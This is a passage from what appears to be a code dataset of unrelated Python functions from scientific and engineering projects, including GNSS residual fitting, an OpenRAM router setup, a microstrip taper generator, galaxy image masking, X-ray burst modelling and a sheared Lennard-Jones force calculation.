res.reject_absVal(site_residuals,100.)\n del site_residuals \n data = res.reject_outliers_elevation(tdata,5,0.5)\n del tdata\n\n numd = np.shape(data)[0]\n numZD = int(90.0/zenSpacing) + 1\n numAZ = int(360./zenSpacing)\n pwl_All = np.zeros((numAZ,numZD))\n pwlSig_All = np.zeros((numAZ,numZD))\n Bvec_complete = []\n Sol_complete = []\n meas_complete = []\n model_complete = []\n postchis = []\n prechis = []\n aics = []\n bics = []\n #w = 1;\n\n for j in range(0,numAZ):\n # Find only those value within this azimuth bin:\n if(j - azSpacing/2. < 0) :\n criterion = (data[:,1] < (j + azSpacing/2.)) | (data[:,1] > (360. - azSpacing/2.) )\n else:\n criterion = (data[:,1] < (j + azSpacing/2.)) & (data[:,1] > (j - azSpacing/2.) )\n ind = np.array(np.where(criterion))[0]\n azData =data[ind,:]\n numd = np.shape(azData)[0]\n #print(\"NUMD:\",numd)\n if numd < 2:\n continue\n #\n # Neq is acting like a constrain on the model a small value 0.001\n # let the model vary by 1000 mm\n # will let it vary more. a large value -> 1 will force the model to be closer to 0\n # This gets too large for lots of observations, s best to doit on the fly..\n #\n Neq = np.eye(numZD,dtype=float)# * 0.001\n Apart = np.zeros((numd,numZD))\n\n for i in range(0,numd):\n iz = int(np.floor(azData[i,2]/zenSpacing))\n Apart[i,iz] = (1.-(azData[i,2]-iz*zenSpacing)/zenSpacing)\n Apart[i,iz+1] = (azData[i,2]-iz*zenSpacing)/zenSpacing\n w = np.sin(data[i,2]/180.*np.pi)\n for k in range(iz,iz+2):\n for l in range(iz,iz+2):\n Neq[k,l] = Neq[k,l] + (Apart[i,l]*Apart[i,k]) * 1./w**2\n\n prechi = np.dot(azData[:,3].T,azData[:,3])\n\n Bvec = np.dot(Apart.T,azData[:,3])\n for val in Bvec:\n Bvec_complete.append(val)\n\n Cov = np.linalg.pinv(Neq)\n Sol = np.dot(Cov,Bvec)\n for val in Sol:\n Sol_complete.append(val)\n\n #Qxx = np.dot(Apart.T,Apart)\n #Qvv = np.subtract( np.eye(numd) , np.dot(np.dot(Apart,Qxx),Apart.T))\n #sd = np.squeeze(np.diag(Qvv))\n #dx = np.dot(np.linalg.pinv(Qxx),Bvec)\n #dl = np.dot(Apart,dx)\n\n postchi = prechi - np.dot(Bvec.T,Sol)\n postchis.append(np.sqrt(postchi/numd))\n prechis.append(np.sqrt(prechi/numd))\n pwlsig = np.sqrt(np.diag(Cov) *postchi/numd)\n\n # calculate the model values for each obs\n model = np.dot(Apart,Sol) #np.zeros(numd)\n for d in range(0,numd):\n model_complete.append(model[d])\n meas_complete.append(azData[d,3])\n # zen = azData[d,2]\n # iz = int(np.floor(azData[d,2]/zenSpacing))\n # #model[d] = Sol[iz]\n\n #print(\"STATS:\",numd,np.sqrt(prechi/numd),np.sqrt(postchi/numd),np.sqrt((prechi-postchi)/numd),gls_results.rsquared,gls_results.aic,gls_results.bic)\n \n # loglikelihood(meas,model,sd)\n #sd = np.squeeze(np.diag(Qvv))\n #print(\"meas, model, sd:\",np.shape(azData),np.shape(model),np.shape(sd))\n f = loglikelihood(azData[:,3],model)\n dof = numd - np.shape(Sol)[0]\n aic = calcAIC(f,dof)\n bic = calcBIC(f,dof,numd)\n aics.append(aic) \n bics.append(bic) \n #print(\"=========================\")\n pwl_All[j,:] = Sol \n pwlSig_All[j,:] = pwlsig\n\n del Sol,pwlsig,Cov,Bvec,Neq,Apart,azData,ind\n\n #A_complete = np.squeeze(np.asarray(A_complete.todense()))\n #print(\"A shape\",np.shape(A_complete))\n\n print(\"Doing a fit to the data\")\n f = loglikelihood(np.array(meas_complete),np.array(model_complete))\n numd = np.size(meas_complete)\n dof = numd - np.shape(Sol_complete)[0]\n aic = calcAIC(f,dof)\n bic = calcBIC(f,dof,numd)\n #prechi = np.dot(data[:,3].T,data[:,3])\n prechi = np.dot(np.array(meas_complete).T,np.array(meas_complete))\n postchi = prechi - np.dot(np.array(Bvec_complete).T,np.array(Sol_complete))\n #print(\"My loglikelihood:\",f,aic,bic,dof,numd)\n print(\"STATS:\",numd,np.sqrt(prechi/numd),np.sqrt(postchi/numd),np.sqrt((prechi-postchi)/numd),aic,bic)\n\n return pwl_All, pwlSig_All", "def __init__(self, layers, design, gds_filename=None, rail_track_width=1):\n router_tech.__init__(self, layers, rail_track_width)\n \n self.cell = design\n\n # If didn't specify a gds blockage file, write it out to read the gds\n # This isn't efficient, but easy for now\n #start_time = datetime.now()\n if not gds_filename:\n gds_filename = OPTS.openram_temp+\"temp.gds\"\n self.cell.gds_write(gds_filename)\n\n # Load the gds file and read in all the shapes\n self.layout = gdsMill.VlsiLayout(units=GDS[\"unit\"])\n self.reader = gdsMill.Gds2reader(self.layout)\n self.reader.loadFromFile(gds_filename)\n self.top_name = self.layout.rootStructureName\n #print_time(\"GDS read\",datetime.now(), start_time)\n \n ### The pin data structures\n # A map of pin names to a set of pin_layout structures\n # (i.e. pins with a given label)\n self.pins = {}\n # This is a set of all pins (ignoring names) so that can quickly not create blockages for pins\n # (They will be blocked when we are routing other nets based on their name.)\n self.all_pins = set()\n \n # The labeled pins above categorized into pin groups that are touching/connected.\n self.pin_groups = {}\n \n ### The blockage data structures\n # A list of metal shapes (using the same pin_layout structure) that are not pins but blockages.\n self.blockages=[]\n # The corresponding set of blocked grids for above pin shapes\n self.blocked_grids = set()\n \n ### The routed data structures\n # A list of paths that have been \"routed\"\n self.paths = []\n # A list of path blockages (they might be expanded for wide metal DRC)\n self.path_blockages = []\n\n # The boundary will determine the limits to the size of the routing grid\n self.boundary = self.layout.measureBoundary(self.top_name)\n # These must be un-indexed to get rid of the matrix type\n self.ll = vector(self.boundary[0][0], self.boundary[0][1])\n self.ur = vector(self.boundary[1][0], self.boundary[1][1])", "def __init__(self,batery_size = 75):\n self.batery_size = batery_size", "def hecken_taper(length = 200, B = 4.0091, dielectric_thickness = 0.25,\n eps_r = 2, Lk_per_sq = 250e-12, Z1 = None, Z2 = None,\n width1 = None, width2 = None, num_pts = 100, layer = 0):\n if width1 is not None: Z1 = _microstrip_Z_with_Lk(\n width1*1e-6,\n dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )\n if width2 is not None: Z2 = _microstrip_Z_with_Lk(\n width2*1e-6,\n dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )\n # Normalized length of the wire [-1 to +1]\n xi_list = np.linspace(-1, 1, num_pts)\n Z = [np.exp(0.5*log(Z1*Z2) + 0.5*log(Z2/Z1)*_G(xi, B)) for xi in xi_list]\n widths = np.array([_find_microstrip_wire_width(\n z, dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )*1e6 for z in Z])\n x = ((xi_list/2)*length)\n\n # Compensate for varying speed of light in the microstrip by shortening\n # and lengthening sections according to the speed of light in that section\n v = np.array([_microstrip_v_with_Lk(w*1e-6, dielectric_thickness*1e-6,\n eps_r, Lk_per_sq) for w in widths])\n dx = np.diff(x)\n dx_compensated = dx*v[:-1]\n x_compensated = np.cumsum(dx_compensated)\n x = np.hstack([0, x_compensated])/max(x_compensated) * length\n\n # Create blank device and add taper polygon\n D = Device('hecken')\n xpts = np.concatenate([x, x[::-1]])\n ypts = np.concatenate([widths/2, -widths[::-1]/2])\n D.add_polygon((xpts, ypts), layer = layer)\n D.add_port(name = 1, midpoint = (0, 0), width = widths[0],\n orientation = 180)\n D.add_port(name = 2, midpoint = (length, 0), width = widths[-1],\n orientation = 0)\n\n # Add meta information about the taper\n D.info['num_squares'] = np.sum(np.diff(x)/widths[:-1])\n D.info['width1'] = widths[0]\n D.info['width2'] = widths[-1]\n D.info['Z1'] = Z[0]\n D.info['Z2'] = Z[-1]\n # Note there are two values for v/c (and f_cutoff) because the speed of\n # light is different at the beginning and end of the taper\n D.info['w'] = widths\n D.info['x'] = x\n D.info['Z'] = Z\n D.info['v/c'] = v/3e8\n D.info['time_length'] = np.sum(np.diff(D.info['x']*1e-6) \\\n / (D.info['v/c'][:-1]*3e8))\n BetaLmin = sqrt(B**2 + 6.523)\n D.info['f_cutoff'] = 1/(2*D.info['time_length'])\n D.info['length'] = length\n\n return D", "def _build_multiband_mask(data, tractor, filt2pixscale, fill_value=0.0,\n threshmask=0.01, r50mask=0.05, maxshift=10,\n relmaxshift=0.1,\n sigmamask=3.0, neighborfactor=1.0, verbose=False):\n import numpy.ma as ma\n from copy import copy\n from skimage.transform import resize\n from legacyhalos.mge import find_galaxy\n from legacyhalos.misc import srcs2image, ellipse_mask\n\n import matplotlib.pyplot as plt\n from astropy.visualization import simple_norm\n\n bands, refband = data['bands'], data['refband']\n #residual_mask = data['residual_mask']\n\n #nbox = 5\n #box = np.arange(nbox)-nbox // 2\n #box = np.meshgrid(np.arange(nbox), np.arange(nbox))[0]-nbox//2\n\n xobj, yobj = np.ogrid[0:data['refband_height'], 0:data['refband_width']]\n\n # If the row-index of the central galaxy is not provided, use the source\n # nearest to the center of the field.\n if 'galaxy_indx' in data.keys():\n galaxy_indx = np.atleast_1d(data['galaxy_indx'])\n else:\n galaxy_indx = np.array([np.argmin((tractor.bx - data['refband_height']/2)**2 +\n (tractor.by - data['refband_width']/2)**2)])\n data['galaxy_indx'] = np.atleast_1d(galaxy_indx)\n data['galaxy_id'] = ''\n\n #print('Import hack!')\n #norm = simple_norm(img, 'log', min_percent=0.05, clip=True)\n #import matplotlib.pyplot as plt ; from astropy.visualization import simple_norm\n\n ## Get the PSF sources.\n #psfindx = np.where(tractor.type == 'PSF')[0]\n #if len(psfindx) > 0:\n # psfsrcs = tractor.copy()\n # psfsrcs.cut(psfindx)\n #else:\n # psfsrcs = None\n\n def tractor2mge(indx, factor=1.0):\n # Convert a Tractor catalog entry to an MGE object.\n class MGEgalaxy(object):\n pass\n\n default_majoraxis = tractor.diam_init[indx] * 60 / 2 / filt2pixscale[refband] # [pixels]\n default_pa = tractor.pa_init[indx]\n default_ba = tractor.ba_init[indx]\n #default_theta = (270 - default_pa) % 180\n #default_eps = 1 - tractor.ba_init[indx]\n\n #if tractor.sga_id[indx] > -1:\n if tractor.type[indx] == 'PSF' or tractor.shape_r[indx] < 2:\n pa = tractor.pa_init[indx]\n ba = tractor.ba_init[indx]\n # take away the extra factor of 2 we put in in read_sample()\n r50 = tractor.diam_init[indx] * 60 / 2 / 2\n if r50 < 5:\n r50 = 5.0 # minimum size, arcsec\n majoraxis = factor * r50 / filt2pixscale[refband] # [pixels]\n #majoraxis = factor * tractor.diam_init[indx] * 60 / 2 / 2 / filt2pixscale[refband] # [pixels]\n else:\n ee = np.hypot(tractor.shape_e1[indx], tractor.shape_e2[indx])\n ba = (1 - ee) / (1 + ee)\n pa = 180 - (-np.rad2deg(np.arctan2(tractor.shape_e2[indx], tractor.shape_e1[indx]) / 2))\n pa = pa % 180\n\n # can be zero (or very small) if fit as a PSF or REX\n if tractor.shape_r[indx] > 1:\n majoraxis = factor * tractor.shape_r[indx] / filt2pixscale[refband] # [pixels]\n else:\n majoraxis = factor * tractor.diam_init[indx] * 60 / 2 / 2 / filt2pixscale[refband] # [pixels]\n\n mgegalaxy = MGEgalaxy()\n \n mgegalaxy.xmed = tractor.by[indx]\n mgegalaxy.ymed = tractor.bx[indx]\n mgegalaxy.xpeak = tractor.by[indx]\n mgegalaxy.ypeak = tractor.bx[indx]\n\n # never use the Tractor geometry (only the centroid)\n # https://portal.nersc.gov/project/cosmo/temp/ioannis/virgofilaments-html/215/NGC5584/NGC5584.html\n if True:\n mgegalaxy.eps = 1-ba\n mgegalaxy.pa = pa\n mgegalaxy.theta = (270 - pa) % 180\n mgegalaxy.majoraxis = majoraxis\n else:\n mgegalaxy.eps = 1 - default_ba\n mgegalaxy.pa = default_pa\n mgegalaxy.theta = (270 - default_pa) % 180\n mgegalaxy.majoraxis = default_majoraxis\n\n # always restore all pixels within the nominal / initial size of the galaxy\n #objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n # default_majoraxis,\n # default_majoraxis * (1-default_eps), \n # np.radians(default_theta-90), xobj, yobj)\n #objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n # default_majoraxis, default_majoraxis, 0.0, xobj, yobj)\n\n objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n mgegalaxy.majoraxis,\n mgegalaxy.majoraxis * (1-mgegalaxy.eps), \n np.radians(mgegalaxy.theta-90), xobj, yobj)\n\n # central 10% pixels can override the starmask\n objmask_center = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n 0.1*mgegalaxy.majoraxis,\n 0.1*mgegalaxy.majoraxis * (1-mgegalaxy.eps), \n np.radians(mgegalaxy.theta-90), xobj, yobj)\n\n return mgegalaxy, objmask, objmask_center\n\n # Now, loop through each 'galaxy_indx' from bright to faint.\n data['mge'] = []\n for ii, central in enumerate(galaxy_indx):\n print('Determing the geometry for galaxy {}/{}.'.format(\n ii+1, len(galaxy_indx)))\n\n # [1] Determine the non-parametric geometry of the galaxy of interest\n # in the reference band. First, subtract all models except the galaxy\n # and galaxies \"near\" it. Also restore the original pixels of the\n # central in case there was a poor deblend.\n largeshift = False\n mge, centralmask, centralmask2 = tractor2mge(central, factor=1.0)\n #plt.clf() ; plt.imshow(centralmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask.png') ; pdb.set_trace()\n\n iclose = np.where([centralmask[np.int(by), np.int(bx)]\n for by, bx in zip(tractor.by, tractor.bx)])[0]\n \n srcs = tractor.copy()\n srcs.cut(np.delete(np.arange(len(tractor)), iclose))\n model = srcs2image(srcs, data['{}_wcs'.format(refband.lower())],\n band=refband.lower(),\n pixelized_psf=data['{}_psf'.format(refband.lower())])\n\n img = data[refband].data - model\n img[centralmask] = data[refband].data[centralmask]\n\n mask = np.logical_or(ma.getmask(data[refband]), data['residual_mask'])\n #mask = np.logical_or(data[refband].mask, data['residual_mask'])\n\n # restore the central pixels but not the masked stellar pixels\n centralmask[np.logical_and(data['starmask'], np.logical_not(centralmask2))] = False\n mask[centralmask] = False\n\n img = ma.masked_array(img, mask)\n ma.set_fill_value(img, fill_value)\n #if ii == 1:\n # pdb.set_trace()\n\n mgegalaxy = find_galaxy(img, nblob=1, binning=1, quiet=False)#, plot=True) ; plt.savefig('cosmo-www/tmp/junk-mge.png')\n #plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('junk-mask.png')\n ##plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n #pdb.set_trace()\n\n # Did the galaxy position move? If so, revert back to the Tractor geometry.\n if np.abs(mgegalaxy.xmed-mge.xmed) > maxshift or np.abs(mgegalaxy.ymed-mge.ymed) > maxshift:\n print('Large centroid shift (x,y)=({:.3f},{:.3f})-->({:.3f},{:.3f})'.format(\n mgegalaxy.xmed, mgegalaxy.ymed, mge.xmed, mge.ymed))\n print(' Reverting to the default geometry and the Tractor centroid.')\n largeshift = True\n mgegalaxy = copy(mge)\n\n radec_med = data['{}_wcs'.format(refband.lower())].pixelToPosition(\n mgegalaxy.ymed+1, mgegalaxy.xmed+1).vals\n radec_peak = data['{}_wcs'.format(refband.lower())].pixelToPosition(\n mgegalaxy.ypeak+1, mgegalaxy.xpeak+1).vals\n mge = {\n 'largeshift': largeshift,\n 'ra': tractor.ra[central], 'dec': tractor.dec[central],\n 'bx': tractor.bx[central], 'by': tractor.by[central],\n #'mw_transmission_g': tractor.mw_transmission_g[central],\n #'mw_transmission_r': tractor.mw_transmission_r[central],\n #'mw_transmission_z': tractor.mw_transmission_z[central],\n 'ra_moment': radec_med[0], 'dec_moment': radec_med[1],\n #'ra_peak': radec_med[0], 'dec_peak': radec_med[1]\n }\n for key in ('eps', 'majoraxis', 'pa', 'theta', 'xmed', 'ymed', 'xpeak', 'ypeak'):\n mge[key] = np.float32(getattr(mgegalaxy, key))\n if key == 'pa': # put into range [0-180]\n mge[key] = mge[key] % np.float32(180)\n data['mge'].append(mge)\n\n #if False:\n # #plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n # plt.clf() ; mgegalaxy = find_galaxy(img, nblob=1, binning=1, quiet=True, plot=True)\n # plt.savefig('/mnt/legacyhalos-data/debug.png')\n\n # [2] Create the satellite mask in all the bandpasses. Use srcs here,\n # which has had the satellites nearest to the central galaxy trimmed\n # out.\n print('Building the satellite mask.')\n satmask = np.zeros(data[refband].shape, bool)\n for filt in bands:\n # do not let GALEX and WISE contribute to the satellite mask\n if data[filt].shape != satmask.shape:\n continue\n \n cenflux = getattr(tractor, 'flux_{}'.format(filt.lower()))[central]\n satflux = getattr(srcs, 'flux_{}'.format(filt.lower()))\n if cenflux <= 0.0:\n #raise ValueError('Central galaxy flux is negative!')\n print('Central galaxy flux is negative! Proceed with caution...')\n #pdb.set_trace()\n \n satindx = np.where(np.logical_or(\n (srcs.type != 'PSF') * (srcs.shape_r > r50mask) *\n (satflux > 0.0) * ((satflux / cenflux) > threshmask),\n srcs.ref_cat == 'R1'))[0]\n #satindx = np.where(srcs.ref_cat == 'R1')[0]\n #if np.isin(central, satindx):\n # satindx = satindx[np.logical_not(np.isin(satindx, central))]\n if len(satindx) == 0:\n #raise ValueError('All satellites have been dropped!')\n #print('Warning! All satellites have been dropped from band {}!'.format(filt))\n print('Note: no satellites to mask in band {}.'.format(filt))\n else:\n satsrcs = srcs.copy()\n #satsrcs = tractor.copy()\n satsrcs.cut(satindx)\n satimg = srcs2image(satsrcs, data['{}_wcs'.format(filt.lower())],\n band=filt.lower(),\n pixelized_psf=data['{}_psf'.format(filt.lower())])\n thissatmask = satimg > sigmamask*data['{}_sigma'.format(filt.lower())]\n #if filt == 'FUV':\n # plt.clf() ; plt.imshow(thissatmask, origin='lower') ; plt.savefig('junk-{}.png'.format(filt.lower()))\n # #plt.clf() ; plt.imshow(data[filt], origin='lower') ; plt.savefig('junk-{}.png'.format(filt.lower()))\n # pdb.set_trace()\n if satmask.shape != satimg.shape:\n thissatmask = resize(thissatmask*1.0, satmask.shape, mode='reflect') > 0\n\n satmask = np.logical_or(satmask, thissatmask)\n #if True:\n # import matplotlib.pyplot as plt\n # plt.clf() ; plt.imshow(np.log10(satimg), origin='lower') ; plt.savefig('debug.png')\n # plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('debug.png')\n ## #plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n # pdb.set_trace()\n\n #print(filt, np.sum(satmask), np.sum(thissatmask))\n\n #plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-satmask.png')\n \n # [3] Build the final image (in each filter) for ellipse-fitting. First,\n # subtract out the PSF sources. Then update the mask (but ignore the\n # residual mask). Finally convert to surface brightness.\n #for filt in ['W1']:\n for filt in bands:\n thismask = ma.getmask(data[filt])\n if satmask.shape != thismask.shape:\n _satmask = (resize(satmask*1.0, thismask.shape, mode='reflect') > 0) == 1.0\n _centralmask = (resize(centralmask*1.0, thismask.shape, mode='reflect') > 0) == 1.0\n mask = np.logical_or(thismask, _satmask)\n mask[_centralmask] = False\n else:\n mask = np.logical_or(thismask, satmask)\n mask[centralmask] = False\n #if filt == 'r':\n # #plt.imshow(_satmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-satmask-{}.png'.format(filt))\n # plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask-{}.png'.format(filt))\n # plt.clf() ; plt.imshow(img, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-img-{}.png'.format(filt))\n # pdb.set_trace()\n\n varkey = '{}_var'.format(filt.lower())\n imagekey = '{}_masked'.format(filt.lower())\n psfimgkey = '{}_psfimg'.format(filt.lower())\n thispixscale = filt2pixscale[filt]\n if imagekey not in data.keys():\n data[imagekey], data[varkey], data[psfimgkey] = [], [], []\n\n img = ma.getdata(data[filt]).copy()\n \n # Get the PSF sources.\n psfindx = np.where((tractor.type == 'PSF') * (getattr(tractor, 'flux_{}'.format(filt.lower())) / cenflux > threshmask))[0]\n if len(psfindx) > 0 and filt.upper() != 'W3' and filt.upper() != 'W4': \n #if len(psfindx) > 0 and filt.upper() != 'NUV' and filt.upper() != 'FUV' and filt.upper() != 'W3' and filt.upper() != 'W4':\n psfsrcs = tractor.copy()\n psfsrcs.cut(psfindx)\n else:\n psfsrcs = None\n \n if psfsrcs:\n psfimg = srcs2image(psfsrcs, data['{}_wcs'.format(filt.lower())],\n band=filt.lower(),\n pixelized_psf=data['{}_psf'.format(filt.lower())])\n if False:\n #import fitsio ; fitsio.write('junk-psf-{}.fits'.format(filt.lower()), data['{}_psf'.format(filt.lower())].img, clobber=True)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n im = ax1.imshow(np.log10(img), origin='lower') ; fig.colorbar(im, ax=ax1)\n im = ax2.imshow(np.log10(psfimg), origin='lower') ; fig.colorbar(im, ax=ax2)\n im = ax3.imshow(np.log10(data['{}_psf'.format(filt.lower())].img), origin='lower') ; fig.colorbar(im, ax=ax3)\n im = ax4.imshow(img-psfimg, origin='lower') ; fig.colorbar(im, ax=ax4)\n plt.savefig('desi-users/ioannis/tmp/qa-psf-{}.png'.format(filt.lower()))\n if filt == 'r':# or filt == 'r':\n pdb.set_trace()\n img -= psfimg\n else:\n psfimg = np.zeros((2, 2), 'f4')\n\n data[psfimgkey].append(psfimg)\n \n img = ma.masked_array((img / thispixscale**2).astype('f4'), mask) # [nanomaggies/arcsec**2]\n var = data['{}_var_'.format(filt.lower())] / thispixscale**4 # [nanomaggies**2/arcsec**4]\n\n # Fill with zeros, for fun--\n ma.set_fill_value(img, fill_value)\n #if ii == 0 and filt == 'r': #filt == 'W1' or \n # plt.clf() ; plt.imshow(img, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-img-{}.png'.format(filt.lower()))\n # plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask-{}.png'.format(filt.lower()))\n ##### plt.clf() ; plt.imshow(thismask, origin='lower') ; plt.savefig('junk-thismask-{}.png'.format(filt.lower()))\n # pdb.set_trace()\n \n data[imagekey].append(img)\n data[varkey].append(var)\n\n #test = data['r_masked'][0]\n #plt.clf() ; plt.imshow(np.log(test.clip(test[mgegalaxy.xpeak, mgegalaxy.ypeak]/1e4)), origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n #pdb.set_trace()\n\n # Cleanup?\n for filt in bands:\n del data[filt]\n del data['{}_var_'.format(filt.lower())]\n\n return data", "def setStretch(self, ln):\n\n s = stof(ln[0])\n\n if s < 1 or s > 500:\n error(\"%s Stretch: value must be a percentage in range 1 to 500, not '%s'\" \\\n % (self.name, s))\n\n self.stretch = s/100.", "def burstensemble( base, x_0, z, dist, xi_p, mass, radius, bean, full_model=False ):\n\n minmdot = 0.0\n maxmdot = 1.0\n mdot_res = 1e-6\n sbt = bean.bstart\n salpha = []\n stime = []\n smdot = []\n se_b = []\n\n mdot = bean.flux_to_mdot(x_0, dist, xi_p, mass, radius, bean.pflux)\n\n for i in range(0, bean.numburstsobs):\n\n tmp = settle(base, z, x_0, mdot[i], 1.0, mass, radius)\n\n res = np.recarray(\n (1,), dtype=[(\"tdel\", np.float64), (\"e_b\", np.float64), (\"alpha\", np.float64), (\"mdot\", np.float64)]\n )\n # assign elements\n res.tdel = tmp.tdel / 24.0\n res.e_b = tmp.E_b*0.8 # multiply eb by 0.8 to account for incomlpete burning of fuel, as in Goodwin et al (2018).\n alpha = tmp.alpha\n alpha = alpha[0]\n res.mdot = mdot[i]\n _e_b = res.e_b\n _e_b = _e_b[0]\n se_b.append(_e_b)\n _mdot = res.mdot\n _mdot = _mdot[0]\n salpha.append(alpha)\n smdot.append(_mdot)\n # stime.append(bstart[i])\n stime.append(tmp.tdel[0])\n mdot_max = max(smdot)\n\n result = dict()\n\n if full_model:\n # model parameters are redundant for the model returned\n result[\"base\"] = [base]\n result[\"z\"] = [z]\n result[\"x_0\"] = [x_0]\n result[\"dist\"] = [dist]\n result[\"xi_p\"] = [xi_p]\n\n result[\"mdot_max\"] = [mdot_max]\n\n result[\"mass\"] = [mass]\n result[\"radius\"] = [radius]\n\n # now the actual predictions\n\n result[\"time\"] = stime\n result[\"mdot\"] = smdot\n result[\"alpha\"] = salpha\n result[\"e_b\"] = se_b\n\n # omit the printing for now, as it prevents assessing the progress\n # print('ensemble')\n # print(f\"In burstrain fluence is {se_b}\")\n\n return result", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - 